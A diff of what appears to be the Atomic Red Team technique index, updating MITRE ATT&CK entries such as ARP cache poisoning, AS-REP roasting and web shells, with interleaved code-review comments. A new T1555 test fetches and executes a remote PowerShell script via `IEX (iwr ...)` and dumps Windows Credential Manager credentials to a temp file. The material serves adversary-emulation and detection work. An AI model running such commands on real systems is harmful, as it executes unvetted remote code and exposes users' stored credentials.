The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
+
+ On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
external_references:
- source_name: mitre-attack
external_id: T1205
@@ -16185,6 +16805,18 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
@@ -16195,7 +16827,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:27:41.755Z'
+ modified: '2020-10-21T15:30:44.964Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_contributors:
- Josh Day, Gigamon
@@ -16208,12 +16840,13 @@ persistence:
- Linux
- macOS
- Windows
+ - Network
x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_is_subtechnique: false
atomic_tests: []
T1505.002:
@@ -16388,13 +17021,8 @@ persistence:
name: sh
T1078:
technique:
- id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Valid Accounts
- description: |-
- Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
-
- The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078
@@ -16410,8 +17038,13 @@ persistence:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
+
+ The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ name: Valid Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -16422,13 +17055,31 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-06-20T22:44:36.043Z'
+ modified: '2020-10-19T16:01:22.724Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -16439,48 +17090,21 @@ persistence:
- SaaS
- Office 365
- Azure AD
- x_mitre_effective_permissions:
- - User
- - Administrator
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Application control
- - System access controls
- - Anti-virus
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1505.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1505.003
- url: https://attack.mitre.org/techniques/T1505/003
- - url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
- description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
- the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
- source_name: Lee 2013
- - url: https://www.us-cert.gov/ncas/alerts/TA15-314A
- description: US-CERT. (2015, November 13). Compromised Web Servers and Web
- Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
- source_name: US-CERT Alert TA15-314A Web Shells
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Web Shell
+ created: '2019-12-13T16:46:18.927Z'
+ modified: '2020-09-16T19:34:19.752Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb
description: "Adversaries may backdoor web servers with web shells to establish
persistent access to systems. A Web shell is a Web script that is placed on
an openly accessible Web server to allow an adversary to use the Web server
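Review bot: This hunk, like the T1078 hunks just before it, only reorders keys of an otherwise unchanged mapping — the x_mitre_effective_permissions, x_mitre_permissions_required, x_mitre_detection, x_mitre_defense_bypassed and x_mitre_data_sources entries removed here are re-added with identical values in the preceding hunk — which buries the substantive changes in this commit (the corrected CAPEC references, the new sub-techniques, the version bumps) in hundreds of lines of noise. The ordering appears to come from the generator serializing the upstream STIX objects in whatever key order they arrive; emitting with a fixed key order (for example a sorted or explicitly specified field order when dumping the YAML) would make these index diffs reviewable and let a reader spot real content drift. No behavioral change is implied by the reorder itself.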
@@ -16489,21 +17113,34 @@ persistence:
addition to a server-side script, a Web shell may have a client interface
program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020)
Web shell client).(Citation: Lee 2013) "
- id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-04-17T17:47:56.673Z'
- created: '2019-12-13T16:46:18.927Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_system_requirements:
- - Adversary access to Web server with vulnerability or account to upload and
- serve the Web shell file.
- x_mitre_permissions_required:
- - SYSTEM
- - User
+ name: Web Shell
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1505.003
+ url: https://attack.mitre.org/techniques/T1505/003
+ - external_id: CAPEC-650
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/650.html
+ - source_name: Lee 2013
+ description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
+ the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
+ url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
+ - url: https://www.us-cert.gov/ncas/alerts/TA15-314A
+ description: US-CERT. (2015, November 13). Compromised Web Servers and Web
+ Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
+ source_name: US-CERT Alert TA15-314A Web Shells
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_data_sources:
+ - Process monitoring
+ - Netflow/Enclave netflow
+ - File monitoring
+ - Authentication logs
x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms
of persistent remote access, they do not initiate connections. The portion
of the Web shell that is on the server may be small and innocuous looking.
@@ -16517,15 +17154,14 @@ persistence:
Log authentication attempts to the server and any unusual traffic patterns
to or from the server and internal network. (Citation: US-CERT Alert TA15-314A
Web Shells) "
- x_mitre_data_sources:
- - Process monitoring
- - Netflow/Enclave netflow
- - File monitoring
- - Authentication logs
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_permissions_required:
+ - SYSTEM
+ - User
+ x_mitre_system_requirements:
+ - Adversary access to Web server with vulnerability or account to upload and
+ serve the Web shell file.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
identifier: T1505.003
atomic_tests:
- name: Web Shell Written to Disk
@@ -16708,6 +17344,15 @@ persistence:
- source_name: mitre-attack
external_id: T1543.003
url: https://attack.mitre.org/techniques/T1543/003
+ - external_id: CAPEC-478
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/478.html
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- url: https://technet.microsoft.com/en-us/library/cc772408.aspx
description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
source_name: TechNet Services
@@ -16729,12 +17374,12 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:22:10.041Z'
+ modified: '2020-09-16T15:49:58.490Z'
created: '2020-01-17T19:13:50.402Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: "Monitor processes and command-line arguments for actions
that could create or modify services. Command-line invocation of tools capable
of adding or modifying services may be unusual, depending on how systems are
@@ -17081,6 +17726,166 @@ credential-access:
'
name: sh
+ T1557.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1557.002
+ url: https://attack.mitre.org/techniques/T1557/002
+ - source_name: RFC826 ARP
+ url: https://tools.ietf.org/html/rfc826
+ description: Plummer, D. (1982, November). An Ethernet Address Resolution
+ Protocol. Retrieved October 15, 2020.
+ - source_name: Sans ARP Spoofing Aug 2003
+ url: https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411
+ description: Siles, R. (2003, August). Real World ARP Spoofing. Retrieved
+ October 15, 2020.
+ - source_name: Cylance Cleaver
+ description: Cylance. (2014, December). Operation Cleaver. Retrieved September
+ 14, 2017.
+ url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: ARP Cache Poisoning
+ description: |
+ Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
+
+ The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
+
+ An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
+
+ The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
+
+ Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
+ id: attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-16T15:22:11.604Z'
+ created: '2020-10-15T12:05:58.755Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
+ ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches
+ across endpoints for signs of ARP poisoning. For example, if multiple IP addresses
+ map to a single MAC address, this could be an indicator that the ARP cache
+ has been poisoned."
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_contributors:
+ - Jon Sternstein, Stern Security
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ atomic_tests: []
+ T1558.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1558.004
+ url: https://attack.mitre.org/techniques/T1558/004
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
+ 24, 2020.
+ - source_name: Microsoft Kerberos Preauth 2014
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ source_name: SANS Attacking Kerberos Nov 2014
+ url: https://redsiege.com/kerberoast-slides
+ - url: https://adsecurity.org/?p=2293
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ source_name: AdSecurity Cracking Kerberos Dec 2015
+ - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ source_name: Microsoft Detecting Kerberoasting Feb 2018
+ - source_name: Microsoft 4768 TGT 2017
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: AS-REP Roasting
+ description: "Adversaries may reveal credentials of accounts that have disabled
+ Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
+ Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication
+ offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002).
+ When enabled, a user requesting access to a resource initiates communication
+ with the Domain Controller (DC) by sending an Authentication Server Request
+ (AS-REQ) message with a timestamp that is encrypted with the hash of their
+ password. If and only if the DC is able to successfully decrypt the timestamp
+ with the hash of the user’s password, it will then send an Authentication
+ Server Response (AS-REP) message that contains the Ticket Granting Ticket
+ (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation:
+ Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication,
+ an adversary may send an AS-REQ message without the encrypted timestamp and
+ receive an AS-REP message with TGT data which may be encrypted with an insecure
+ algorithm such as RC4. The recovered encrypted data may be vulnerable to offline
+ [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks
+ similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003)
+ and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan
+ 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account
+ registered to a domain, with or without special privileges, can be abused
+ to list all domain accounts that have preauthentication disabled by utilizing
+ Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001)
+ with an LDAP filter. Alternatively, the adversary may send an AS-REQ message
+ for each user. If the DC responds without errors, the account does not require
+ preauthentication and the AS-REP message will already contain the encrypted
+ data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits
+ Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003),
+ [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral
+ Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation:
+ SANS Attacking Kerberos Nov 2014)"
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-10-20T19:30:11.783Z'
+ created: '2020-08-24T13:43:00.028Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Valid domain account
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
+ TGS service ticket requests. Particularly investigate irregular patterns of
+ activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
+ a small time frame, especially if they also request RC4 encryption [Type 0x17],
+ pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
+ Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
+ Microsoft 4768 TGT 2017)'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Authentication logs
+ x_mitre_contributors:
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
T1552.003:
technique:
external_references:
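Review bot: The `x_mitre_detection` text added for T1558.004 tells defenders to enable "Audit Kerberos Service Ticket Operations" and then to look for Event ID 4768; that audit subcategory produces 4769 (TGS requests), whereas 4768 — the TGT request event that an AS-REQ without preauthentication generates, and the one carrying the Pre-Authentication Type field (0x0) the text refers to — is logged under "Audit Kerberos Authentication Service". Anyone following the guidance literally would not collect the event the technique is actually detected with. The entry appears to be copied verbatim from the upstream ATT&CK STIX data, so if this index is regenerated from that bundle the correction belongs upstream rather than in this file; a local fix would read `x_mitre_detection: 'Enable Audit Kerberos Authentication Service and Audit Kerberos Service Ticket Operations to log Kerberos TGT (4768) and TGS (4769) requests. Particularly investigate irregular patterns of`.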
@@ -17183,7 +17988,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-07-09T17:01:18.302Z'
+ modified: '2020-10-21T16:38:27.781Z'
created: '2017-05-31T21:31:22.767Z'
x_mitre_platforms:
- Linux
@@ -17304,7 +18109,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-25T18:18:20.366Z'
+ modified: '2020-10-15T19:39:34.817Z'
created: '2020-02-11T18:47:46.619Z'
x_mitre_contributors:
- Praetorian
@@ -17317,7 +18122,7 @@ credential-access:
It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- AWS
@@ -17460,18 +18265,7 @@ credential-access:
elevation_required: true
T1110.004:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1110.004
- url: https://attack.mitre.org/techniques/T1110/004
- - source_name: US-CERT TA18-068A 2018
- url: https://www.us-cert.gov/ncas/alerts/TA18-086A
- description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
- by Cyber Actors. Retrieved October 2, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Credential Stuffing
+ id: attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -17493,27 +18287,27 @@ credential-access:
* VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
- id: attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc
+ name: Credential Stuffing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1110.004
+ url: https://attack.mitre.org/techniques/T1110/004
+ - external_id: CAPEC-600
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/600.html
+ - source_name: US-CERT TA18-068A 2018
+ url: https://www.us-cert.gov/ncas/alerts/TA18-086A
+ description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
+ by Cyber Actors. Retrieved October 2, 2019.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-29T20:35:36.694Z'
+ modified: '2020-10-19T22:43:45.475Z'
created: '2020-02-11T18:39:59.959Z'
- x_mitre_contributors:
- - Diogo Fernandes
- - Anastasios Pingios
- x_mitre_data_sources:
- - Authentication logs
- - Office 365 account logs
- x_mitre_permissions_required:
- - User
- x_mitre_detection: Monitor authentication logs for system and application login
- failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
- authentication failures are high, then there may be a brute force attempt
- to gain access to a system using legitimate credentials.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
@@ -17524,6 +18318,20 @@ credential-access:
- Office 365
- Azure AD
- SaaS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
+ x_mitre_detection: Monitor authentication logs for system and application login
+ failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
+ authentication failures are high, then there may be a brute force attempt
+ to gain access to a system using legitimate credentials.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_data_sources:
+ - Authentication logs
+ - Office 365 account logs
+ x_mitre_contributors:
+ - Diogo Fernandes
+ - Anastasios Pingios
atomic_tests: []
T1552.001:
technique:
@@ -17689,7 +18497,39 @@ credential-access:
- File monitoring
- Process monitoring
- System calls
- atomic_tests: []
+ identifier: T1555
+ atomic_tests:
+ - name: Extract Windows Credential Manager via VBA
+ auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
+ description: |
+ This module will extract the credentials found within the Windows credential manager and dump
+ them to $env:TEMP\windows-credentials.txt
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft Word must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "word.Application" | Out-Null
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
+ to meet this requirement"
+
+'
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
+ cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
+ Ignore
+
+'
+ name: powershell
T1555.003:
technique:
created: '2020-02-12T18:57:36.041Z'
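Review bot: The new `prereq_command` for the T1555 test calls `Stop-Process -Name $process`, but `$process` is never assigned in that script, so the call most likely fails inside the `try`, the check exits 1 even when Word is installed, and the `word.Application` instance started by `New-Object` is left running. Capture and close the COM object instead: `$word = New-Object -COMObject "word.Application"`, `$word.Quit()`, then `exit 0`. Separately, the executor runs `IEX (iwr "https://raw.githubusercontent.com/.../master/Public/Invoke-MalDoc.ps1")`, fetching from a moving branch with no commit pin or content hash check, so what the test executes is whatever that URL serves at run time; pin a commit or call the Invoke-MalDoc that the invoke-atomicredteam module at that URL appears to ship locally, and if the download stays, compare the fetched content against a known hash before `IEX`. Note also that `$env:TEMP\windows-credentials.txt` holds clear-text credentials after the test, so the description should state that `cleanup_command` must be run rather than treated as optional.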
@@ -18041,11 +18881,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Controller Authentication
- description: "Adversaries may patch the authentication process on a domain control
+ description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
- process on a domain control with the intent of creating a backdoor used to
- access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)).
+ process on a domain controller with the intent of creating a backdoor used
+ to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)).
Skeleton key works through a patch on an enterprise domain controller authentication
process (LSASS) with credentials that adversaries may use to bypass the standard
authentication system. Once patched, an adversary can use the injected password
@@ -18060,7 +18900,7 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-25T20:51:30.829Z'
+ modified: '2020-08-26T14:16:48.125Z'
created: '2020-02-11T19:05:02.399Z'
x_mitre_data_sources:
- Authentication logs
@@ -18147,22 +18987,14 @@ credential-access:
atomic_tests: []
T1187:
technique:
